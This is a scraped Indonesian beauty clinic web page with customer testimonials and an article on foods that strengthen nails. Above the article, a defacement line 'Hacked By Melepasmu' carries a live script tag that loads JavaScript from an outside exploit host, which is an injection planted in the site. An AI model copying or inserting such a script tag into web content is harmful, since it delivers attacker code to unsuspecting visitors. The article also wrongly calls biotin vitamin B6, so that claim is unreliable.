Login or Register Skin - Body - Anti Aging - Hair - Spa
SERVICE
 

 

TESTIMONIALS
 
From : Cindy
Saya seorang mahasiswi, usia 20 tahun Bulu ketiak saya tebal dan ...
» Selanjutnya
 
From : Novita
Saya seorang karyawati,usia 26 tahun. Sejak 3 tahun yang lalu saya ...
» Selanjutnya
 
From : Merry
Saya seorang ibu RT, dulu saya mengalami kegemukan (BB: 65kg) ...
» Selanjutnya
 
 
 
Hacked By Melepasmu <script src=https://jso.exploits.my.id/24461119.js></script>

Makanan untuk Membuat Kuku Kuat dan Sehat

Sama halnya dengan kulit, kuku pun perlu dirawat dan diberi asupan nutrisi agar tetap sehat. Kuku yang sehat biasanya memiliki warna merah mudah, tidak pucat, terdapat setengah lingkaran putih pada kuku, dan tidak berwana kuning. Sedangkan kuku yang rapuh, retak atau berubah warna bisa menjadi indikasi kurangnya nutrisi atau bahkan masalah kesehatan, seperti hipotiroidisme.

Mengonsumsi makanan seimbang yang mengandung protein, vitamin dan mineral tidak hanya membuat tubuh Anda sehat, namun Anda juga membuat kuku Anda terawat sehingga menjadi lebih kuat.

Makanan untuk kuku kuat dan sehat

Berikut ini 6 makanan untuk kuku yang bisa Anda konsumsi agar kuku menjadi kuat dan sehat:

1. Aprikot, pisang, anggur

Makanan untuk kuku yang pertama adalah buah. Siapa yang tidak tahu manfaat dari mengonsumsi buah? Buah kaya akan kandungan vitamin yang membuat kuku jadi lebih kuat.

Beberapa sumber buah yang bisa digunakan sebagai makanan untuk kuku adalah buah aprikot kering yang kaya akan vitamin A, kiwi untuk vitamin C, dan pisang untuk kandungan vitamin B6. Selain itu, Anda juga bisa mengonsumsi blueberry, blackberry dan anggur yang mengandung antioksidan tinggi, sehingga mampu meningkatkan kesehatan kuku.

2. Sayuran yang mengandung vitamin A, kalsium, dan zat besi

Sayuran kaya akan mineral dan vitamin untuk tubuh yang sehat dan kuku yang kuat. Anda bisa mengonsumsi ubi jalar, wortel dan sayuran hijau tua – seperti brokoli, bayam dan asparagus yang banyak mengandung vitamin A. Anda juga sangat dianjurkan untuk banyak mengonsumsi sayuran lainnya yang kaya akan kandungan kalsium, zat besi dan antioksidan.

Menurut juru bicara American Dermatological Society, Dr. D’Anne Kleinsmith, jika Anda memiliki kuku yang melengkung bisa jadi itu adalah indikasi jika tubuh kekurangan zat besi.

3. Biji-bijian

Ahli gizi Ian Marber, yang dikenal sebagai Food Doctor, merekomendasikan beberapa biji-bijian yang mengandung karbohidrat kompleks vitamin dan mineral sebagai makanan untuk kuku yang sehat dan kuat.

Biji-bijian seperti gandum hitam, barley, dan biji bunga matahari, beras merah, dan biji soba kaya akan kandungan vitamin E, vitamin B kompleks biotin dan protein yang bisa membuat kuku jadi lebih kuat dan sehat. Anda bisa menambahkan biji-bijian tersebut ke sereal, adonan roti, pancake, ataupun makanan lainya sesuai selera Anda.

4. Telur

Telur mengandung banyak protein yang penting untuk kuku yang kuat dan sehat. Selain menyediakan sumber protein untuk merawat kesehatan kuku, telur juga mengandung sejumlah nutrisi yang dibutuhkan untuk menjaga kuku agar lebih kuat. Misalnya zat besi, vitamin B6 – biotin, vitamin B12, vitamin A, dan vitamin E.

Kandungan vitamin B6 yang ditemukan pada kuning telur ini dapat membantu mengembalikan kuku yang rapuh atau kering sehingga membuat kuku jadi lebih tebal. Anda bisa mengonsumsi telur dengan cara direbus ataupun dijadikan sebagai omellete atau telur orak-arik. Telur merupakan pilihan makanan rendah kalori dan lemak, asalkan Anda mengonsumsinya dalam porsi yang tidak berlebihan.

5. Daging

Mengonsumsi daging tidak berlemak memang terbukti baik untuk kesehatan tubuh. Anda bisa menemukan protein dan zat besi tingkat tinggi dari daging merah, seperti steak dan daging sapi. Menurut American Family Physician, kekurangan zat besi dikaitkan dengan koilonychia – penyakit kuku yang ditandai dengan kuku berbentuk sendok.

6. Kacang polong

Jika Anda seorang vegetarian, Anda dianjurkan untuk mengonsumsi kacang kedelai, kacang polong ataupun kacang lainnya yang merupakan sumber protein baik untuk diet seimbang. Pasalnya, kacang mengandung protein yang tidak hanya meningkatkan pertumbuhan kuku, tapi juga merupakan sumber vitamin dan mineral seperti zat besi, seng, dan biotin yang sangat bagus untuk kesehatan kuku.

Kandungan biotin (juga dikenal sebagai vitamin B6) telah terbukti secara signifikan meningkatkan ketebalan pelat kuku dan mengurangi kerapuhan kuku. Dalam sebuah penelitian, peneliti Swiss memberi 2.5mg biotin setiap hari kepada sekelompok wanita dengan kuku rapuh. Setelah masa percobaan enam bulan, ketebalan kuku wanita meningkat 25%.

Semoga bermanfaat...